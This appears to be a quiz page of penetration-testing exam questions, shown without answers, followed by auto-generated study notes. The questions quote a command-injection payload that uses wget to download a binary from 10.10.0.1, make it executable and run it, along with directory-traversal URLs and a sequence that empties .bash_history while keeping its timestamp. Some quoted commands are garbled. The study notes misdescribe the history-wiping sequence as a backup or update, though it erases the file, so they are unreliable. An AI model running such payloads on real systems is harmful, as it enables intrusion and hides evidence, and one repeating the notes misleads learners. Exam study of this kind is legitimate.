Podcast Beta
Questions and Answers
Which of the following commands will allow a penetration tester to permit a shell script to be executed by the file owner?
A penetration tester gains access to a system and establishes persistence, and then run the following commands:
cat /dev/null > temp touch -r .bash_history temp my temp .bash_history
Which of the following actions is the tester MOST likely performing?
A compliance-based penetration test is primarily concerned with:
A penetration tester is explaining the MITRE ATT&CK framework to a company's chief legal counsel. Which of the following would the tester MOST likely describe as a benefit of the framework?
Signup and view all the answers
Which of the following BEST describe the OWASP Top 10? (Choose two.)
Signup and view all the answers
A penetration tester discovered a vulnerability that provides the ability to upload to a path via discovery traversal. Some of the files that were discovered through this vulnerability are:
https://xx.xx.xx.x/vpn/../vpns/portal/scripts/newbm.pl https://xx.xx.xx.x/vpn/../vpns/portal/scripts/rmbm.pl https://xx.xx.xx.x/vpn/../vpns/portal/scripts/picktheme.pl https://xx.xx.xx.x/vpn/../vpns/cfg/smb.conf
Which of the following is the BEST method to help an attacker gain internal access to the affected machine?
Signup and view all the answers
A company obtained permission for a vulnerability scan from its cloud service provider and now wants to test the security of its hosted data. Which of the following should the tester verify FIRST to assess this risk?
Signup and view all the answers
A penetration tester ran the following command on a staging server: python -m SimpleHTTPServer 9891 Which of the following commands could be used to download a file named exploit to a target machine for execution?
Signup and view all the answers
A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:
exploit "POST" exploit + "/cgi-bin/index.cgi?action-login&Path-%27%0A/bin/sh${sytem.IFS())- c$ { system. IFS () }' cd$ { system. IFS ()}/tmp; ${system. IFS () } wget$ { system. IFS () } http://10.10.0.1/apache; ${system. IFS () } chmod$ { system. IFS () }777 $(system. IFS () } apache${system. IFS ()}./apache' %0A%27&loginUSer=a&pwd=a" exploit += "HTTP/1.1"
Which of the following commands should the penetration tester run post-engagement?
Signup and view all the answers
Which of the following is MOST important to include in the final report of a static application-security test that was written with a team of application developers as the intended audience?
Signup and view all the answers
Study Notes
Bash History Management
- The provided code snippet demonstrates a sequence of commands intended to manage the Bash history file,
.bash_history. - The commands involve creating, modifying, and renaming files to ultimately overwrite the existing
.bash_historyfile with a potentially updated version. - The first command,
cat /dev/null > temp, initializes an empty file named "temp" by redirecting the output of/dev/null(an empty device) to it. - The second command,
touch -r.bash_history temp, updates the timestamp and metadata of the "temp" file to match those of the.bash_historyfile, potentially preserving crucial information about the history file. - Finally,
mv temp.bash_historyrenames the "temp" file to.bash_history, effectively overwriting the original.bash_historyfile with the modified "temp" file. - The overall purpose of these commands suggests a process for either backing up or manipulating the
.bash_history, a file crucial for maintaining and recalling previously executed commands within a shell.
Studying That Suits You
Use AI to generate personalized quizzes and flashcards to suit your learning preferences.
Description
This quiz assesses your knowledge of shell scripting commands related to file permissions. Understand how to modify file attributes to allow execution by the file owner, which is a crucial skill for penetration testers. Test your grasp of security practices in scripting.
